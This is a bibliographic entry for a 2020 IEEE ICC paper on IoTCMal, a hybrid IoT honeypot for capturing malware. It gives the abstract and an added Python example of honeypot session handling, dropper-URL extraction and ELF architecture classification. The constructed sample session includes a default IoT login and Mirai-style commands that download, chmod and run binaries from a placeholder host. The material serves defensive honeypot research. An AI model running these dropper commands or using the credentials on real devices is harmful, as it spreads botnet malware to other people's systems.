IoTCMal: Towards A Hybrid IoT Honeypot for Capturing and Analyzing Malware

Title: IoTCMal: Towards A Hybrid IoT Honeypot for Capturing and Analyzing Malware
Publication Type: Conference Paper
Year of Publication: 2020
Authors: Wang, B., Dou, Y., Sang, Y., Zhang, Y., Huang, J.
Conference Name: ICC 2020 - 2020 IEEE International Conference on Communications (ICC)
Date Published: June 2020
ISBN Number: 978-1-7281-5089-5
Keywords: authentication, authentication services, authorisation, Bridges, command injection attacks, composability, Computer hacking, homology analysis, honeypot, hybrid IoT honeypot, Internet of Things, invasive software, IoT, IoT device, IoTC-MAL, IoTCMal, low-interactive IoT honeypots, malicious samples, Malware, Metrics, network-connected devices, pubcrawl, resilience, Resiliency, Servers, video surveillance, virtual environment, virtualisation, vulnerabilities

The emerging Internet of Things (IoT) emphasizes the need for security of network-connected devices. Two types of services on IoT devices are easily exploited by attackers: weakly authenticated services (e.g., SSH/Telnet) and services vulnerable to command injection. Based on this observation, we propose IoTCMal, a hybrid IoT honeypot framework for capturing a more comprehensive set of malicious samples targeting IoT devices. The novelty of IoTCMal is three-fold: (i) it provides a high-interaction component that exposes common vulnerable services on real IoT devices by forwarding traffic to them; (ii) it contains a low-interaction component offering Telnet/SSH services in a virtual environment; and (iii) unlike traditional low-interaction IoT honeypots [1], which only classify captured samples into malware families, IoTCMal focuses on homology analysis of the samples. We deployed IoTCMal on 36 VPS (virtual private server) instances distributed across 13 cities in 6 countries. By analyzing the malware binaries captured by IoTCMal, we discovered 8 malware families controlled by at least 11 groups of attackers, which mainly launched DDoS attacks and cryptocurrency mining. About 60% of the captured samples were built for the ARM or MIPS architectures, which are widely used in IoT devices.
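As an added example (not code from the IoTCMal paper or its authors), the following Python sketches the low-interaction Telnet component the abstract describes and two post-capture steps that feed the kind of sample analysis it reports: extracting dropper URLs from the recorded commands and classifying fetched binaries by ELF architecture. The session transcript, the download host (RFC 5737 documentation address 203.0.113.9) and the ELF header bytes are constructed test data, and the function names are this example's own.

```python
"""Low-interaction Telnet honeypot logic with post-capture sample triage.

Added example, not code from the IoTCMal paper. Models the Telnet/SSH-style
low-interaction component from the abstract (accept any credentials, emulate
a BusyBox shell, record the session), then extracts dropper URLs from the
recorded commands and classifies fetched binaries by ELF e_machine.
All session lines and ELF bytes are constructed; function names are our own.
"""
import re
import struct

# Constructed login + payload sequence in the style of Telnet IoT bots.
SAMPLE_SESSION = [
    "root\r\n",
    "xc3511\r\n",
    "enable\r\n",
    "sh\r\n",
    "/bin/busybox ECCHI\r\n",
    "cd /tmp; wget http://203.0.113.9/bins/arm7 -O /tmp/.x; chmod +x /tmp/.x; /tmp/.x\r\n",
    "curl -s -o /tmp/.m http://203.0.113.9/bins/mips; chmod 777 /tmp/.m; /tmp/.m\r\n",
]

BANNER = "\r\nBusyBox v1.22.1 (2016-05-03 12:01:11 UTC) built-in shell (ash)\r\n# "


def fake_reply(cmd):
    """Answer like a BusyBox shell. Bots probe with a nonsense applet name
    (e.g. ECCHI) and expect 'applet not found' before sending their payload."""
    m = re.match(r"(?:/bin/)?busybox\s+(\S+)$", cmd.strip())
    if m:
        return f"{m.group(1)}: applet not found\r\n# "
    return "# "


def handle_session(lines):
    """Run the login -> password -> shell state machine over received lines.
    Every credential pair is accepted so brute-forcers reach the payload stage."""
    rec = {"username": None, "password": None, "commands": [], "responses": []}
    state = "login"
    for raw in lines:
        line = raw.rstrip("\r\n")
        if state == "login":
            rec["username"] = line
            rec["responses"].append("Password: ")
            state = "password"
        elif state == "password":
            rec["password"] = line
            rec["responses"].append(BANNER)
            state = "shell"
        else:
            rec["commands"].append(line)
            rec["responses"].append(fake_reply(line))
    return rec


# wget/curl invocation followed, within the same shell segment, by an http(s) URL.
URL_RE = re.compile(r"\b(?:wget|curl)\b[^;&|]*?(https?://[^\s;&|'\"]+)")


def dropper_urls(commands):
    """Return the distinct download URLs issued via wget/curl, in order seen."""
    seen, out = set(), []
    for cmd in commands:
        for url in URL_RE.findall(cmd):
            if url not in seen:
                seen.add(url)
                out.append(url)
    return out


# e_machine values from the ELF specification for the architectures of interest.
E_MACHINE = {0x03: "x86", 0x08: "MIPS", 0x14: "PowerPC", 0x28: "ARM",
             0x2B: "SPARC", 0x3E: "x86-64", 0xB7: "AArch64"}


def elf_arch(data):
    """Classify a captured sample by its ELF header; None if it is not ELF.
    e_machine sits at offset 18 and must be read in the file's own byte order."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    order = ">" if data[5] == 2 else "<"      # EI_DATA: 1 = little, 2 = big endian
    (machine,) = struct.unpack_from(order + "H", data, 18)
    return E_MACHINE.get(machine, f"unknown(0x{machine:02x})")


def fake_elf(e_machine, big_endian=False, bits=32):
    """Constructed ELF header stub (e_ident + e_type + e_machine) for testing."""
    ident = b"\x7fELF" + bytes([1 if bits == 32 else 2, 2 if big_endian else 1, 1]) + b"\x00" * 9
    return ident + struct.pack((">" if big_endian else "<") + "HH", 2, e_machine)


def arch_share(samples, targets=("ARM", "MIPS")):
    """Count architectures and report the fraction falling in `targets`,
    the IoT-typical ISAs the abstract singles out."""
    counts = {}
    for blob in samples:
        arch = elf_arch(blob) or "non-ELF"
        counts[arch] = counts.get(arch, 0) + 1
    hits = sum(counts.get(t, 0) for t in targets)
    return counts, (hits / len(samples) if samples else 0.0)


if __name__ == "__main__":
    rec = handle_session(SAMPLE_SESSION)
    print("creds:", rec["username"], rec["password"])
    print("droppers:", dropper_urls(rec["commands"]))
    samples = [fake_elf(0x28), fake_elf(0x08, big_endian=True), fake_elf(0x08),
               fake_elf(0x03), fake_elf(0x3E, bits=64)]
    print("arch share:", arch_share(samples))
```

The honeypot side deliberately accepts any password and returns the `applet not found` string for BusyBox probes, because many Telnet bots abort if either check fails; the URLs recovered from the session are what a capture pipeline would fetch (in a sandboxed fetcher, never on the honeypot host itself) to obtain the binaries that `elf_arch` then classifies.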

Citation Key: wang_iotcmal_2020